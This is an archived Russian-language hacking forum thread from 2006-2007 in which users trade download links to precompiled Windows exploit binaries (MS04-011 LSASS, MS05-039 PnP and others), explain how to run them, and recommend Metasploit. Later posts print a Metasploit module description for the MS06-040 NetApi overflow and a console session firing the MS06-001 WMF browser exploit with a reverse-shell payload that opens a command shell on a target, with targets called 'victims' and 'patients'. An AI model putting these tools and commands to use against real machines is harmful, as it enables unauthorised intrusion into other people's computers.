Просмотр полной версии : Exploit для Windows.exe
KPOT_f!nd
26.09.2006, 04:33
Челы античата вот открыл раздел Exploit для Windows.exe. Для тех кто не может компилить сплойты для Windows, или у кого не компилиться или нет компилятора! Здесь будут выложенны бинарники(готовые) сплойты. Но есть одно НО кто хочит выкладавать бинарники то прошу всех выкладавать ЧИСТАМИ, без троянов и backdoorov!
Буду сам проверять и отписываться!
Вот качаем архив со сплойтами для Win
windows (http://www.poonk.jino-net.ru/poc/Windows.rar)
В архиве содержится сплойты:
HOD-ms04011-lsasrv-expl.exe
HOD-ms05039-pnp-expl.exe
MS04-007-dos.exe
ms04011lsass.exe
На них документацию можно найти на securitylab.ru (http://www.securitylab.ru)
Почитать про первый сплойт можно здесь
HOD -ms04011-lsasrv-expl (http://www.securitylab.ru/poc/222022.php?phrase_id=35598).
А дальше юзай СЕКЛАБ! Сплойты проверены мной лично антивири кричат говорят что это Exploit.Win32.CAN.2003-0533!
KPOT_f!nd
26.09.2006, 04:40
Сплойты проверены мной лично антивири кричат говорят что это Exploit.Win32.CAN.2003-0533!
Чисты без троев! А кричит он на то что это эксплойт! Любой антивирь будет посылать вас говоря что это сплойт! Однаждый я качнул тоже бинарник(шелла не было под рукой для компиляций) антирирь крикнул что там троян!
тема конечно полезная, держи +, но "Windows.exe" и "backdoorov" убило))
podkashey
26.09.2006, 12:45
ИМХО, если уж выкладывать такие вещи, то в формате: название = краткое описание (хотя бы локальный или ремоут) = ссылка на полное описание и сурс.
А то так смысл темы немного потеряется. Будут люди просто скидывать типа: ZloSend.exe и ищи его описание....
P.S. Ну и само собой подправить первый пост для этого и потереть остальные. ;)
раздел Exploit
Только администраторы имееют прво создавать новые разделы. А это будет просто тема.
SK | Heaton
26.09.2006, 13:27
2A110ut ни говори +))
lol... это старо как win 98
бинарники бугогго
blackybr
26.09.2006, 19:25
Exploit для Windows.exe жестокий ты )))
HOD-ms04011-lsasrv-expl.exe
HOD-ms05039-pnp-expl.exe
MS04-007-dos.exe
ms04011lsass.exe
блин. это сплоиты 2003-2004 года.. не вобиду.. но абсолютно бесполезный топ.
KPOT_f!nd
27.09.2006, 01:11
блин. это сплоиты 2003-2004 года.. не вобиду.. но абсолютно бесполезный топ.
Да это верно! Но не у всех юзеров есть под рукой рабочий компилятор или shell! Пусть они старые зато пашут! ВСЕХ ПРОШУ ПРИНЯТЬ УЧАСТИЕ! Выложите сплойты для винды в бинарном виде, или точнее поделитесь ими
ИМХО, если уж выкладывать такие вещи, то в формате: название = краткое описание (хотя бы локальный или ремоут) = ссылка на полное описание и сурс.
А то так смысл темы немного потеряется. Будут люди просто скидывать типа: ZloSend.exe и ищи его описание....
P.S. Ну и само собой подправить первый пост для этого и потереть остальные. ;)
А че там описывать берешь жмешь Пуск дальше жмешь выполнить вводишь cmd и потом к примеру если сплоит лежит на C диске то к примеру там потом пишем C:\HOD-ms04011-lsasrv-expl.exe а дальше он тебе сам покажет пример как делать
Да это верно! Но не у всех юзеров есть под рукой рабочий компилятор или shell! Пусть они старые зато пашут! ВСЕХ ПРОШУ ПРИНЯТЬ УЧАСТИЕ! Выложите сплойты для винды в бинарном виде, или точнее поделитесь ими
Да по моему нету смысла что они пашут все равно мало кто пользуеться к примеру Win2000 Sp4
Вот к примеру архив с такими сплоитами
http://www.web-hack.ru/download/download.php?go=81
Angel_MakKedo
25.01.2007, 21:14
ЛЮДИ ! Помогите найти описание или как запустить такие эксплоиты как:
MS05-002
MS05-011
MS05-012
MS05-030
MS05-036
MS05-037
MS05-038
MS05-039
MS05-047
MS05-051
MS05-054
MS06-001
MS06-005
MS06-007
MS06-012
Всё это бездвоздмездно(тоесть даром лежит по адресу :) http://type.nm.ru/exp.htm )
За совет по делу скажу СПОСИБО! :)
А проект http://metasploit.com собственно для чего делали ?! ....
Angel_MakKedo
26.01.2007, 00:16
Огромное Спосибо ! Попробую розобратся........
....надо буржуйский язык учить :)
Angel_MakKedo
26.01.2007, 00:55
А проект http://metasploit.com собственно для чего делали ?! ....
ИзвИНИ за глупый вопрос а рускоязычных проэктов нет ?
big_BRAT
26.01.2007, 01:12
Впринцепе руский и не нужен для работы с метасплоитом... Он начала "атаки" и "шела" максимум 4 клика мыши и нужно ввести ИП "жертвы"
ИзвИНИ за глупый вопрос а рускоязычных проэктов нет ?
Вот качай мануал не большой (http://rapidshare.com/files/13383775/metasploit.rar.html)
-=lebed=-
26.01.2007, 01:41
Вот качай мануал не большой (http://rapidshare.com/files/13383775/metasploit.rar.html)
ГЫ! А, что просто ссылку античатовскую не судьба дать на мою статью? :D
to Angel_MakKedo - все ссылки на статьи по Метасплоиту, на русском, найдёшь у меня в подписи...
ГЫ! А, что просто ссылку античатовскую не судьба дать на мою статью?
to Angel_MakKedo - все ссылки на статьи по Метасплоиту, на русском, найдёшь у меня в подпи
Да я фиг знает где че :))) лень сильная штука :)
-=lebed=-
26.01.2007, 01:53
Да я фиг знает где че :))) лень сильная штука :)
Поиск рулит:
http://forum.antichat.ru/search.php?searchid=655706
оффтоп: Один лентяй другому помагает... :D
Один лентяй другому помагает...
отжег :D так второй вобще получается тунеядец :D
Angel_MakKedo
29.01.2007, 23:12
Большо спасибо кому не в лом черкнуть пару строк :)
Понял как подключить пациэнта на ms04-011 в Metasploit!
Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits?
-=lebed=-
30.01.2007, 00:16
Большо спасибо кому не в лом черкнуть пару строк :)
Понял как подключить пациэнта на ms04-011 в Metasploit!
Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits?
ИМХО нет, но и его пробиваемость низка на новых системах:
Уязвимость Server Message Block (MS05-027) хотя и может позволить злоумышленнику проникнуть в ПК, атакующий должен пройти аутентификацию в системе. Эта уязвимость проявляется в Windows XP Service Packs 1 и 2, Windows 2000 Service Packs 3 и 4 и других версиях Windows
тогда уж юзай этот:
msf exploit(ms06_040_netapi) > info
Name: Microsoft Server Service NetpwPathCanonicalize Overflow
Version: 3720
Platform: Windows
Privileged: Yes
License: Metasploit Framework License v1.0
Provided by:
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
1 (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4
2 (wcscpy) Windows XP SP0/SP1
3 (stack) Windows XP SP1 English
4 (stack) Windows XP SP1 Italian
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no proxy chain
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBDOM WORKGROUP no The Windows domain to use for authentication
SMBDirect True yes The target port is a raw SMB service (not NetBIOS)
SMBNAME *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)
SMBPASS no The password for the specified username
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
SMBUSER no The username to authenticate as
SSL no Use SSL
Payload information:
Space: 370
Avoid: 7 characters
Description:
This module exploits a stack overflow in the NetApi32
CanonicalizePathName() function using the NetpwPathCanonicalize RPC
call in the Server Service. It is likely that other RPC calls could
be used to exploit this service. This exploit will result in a
denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed
exploit attempt will likely result in a complete reboot on Windows
2000 and the termination of all SMB-related services on Windows XP.
The default target for this exploit should succeed on Windows NT
4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.
References:
http://www.securityfocus.com/bid/19409
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3439
http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
msf exploit(ms06_040_netapi) >
P.S. Ксати ББ ms05-027 ИМХО уже заменён на ms06-035 (http://www.microsoft.com/rus/technet/security/bulletin/ms06-035.mspx)
only true hэcker can compile zero sploent.
Angel_MakKedo
01.02.2007, 21:49
quote:
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > exploit
# Started reverse handler
# Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5
# Server started.
# Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
msf exploit(ms06_001_wmf_setabortproc) > jobs
# Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495) .....открыта сесcия с cmd
msf exploit(ms06_001_wmf_setabortproc) > jobs
Jobs
====
Id Name
-- ----
0 Exploit: windows/browser/ms06_001_wmf_setabortproc
Ну и как теперь его переключить на передний план задачу с id=0, где пайп с cmd?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot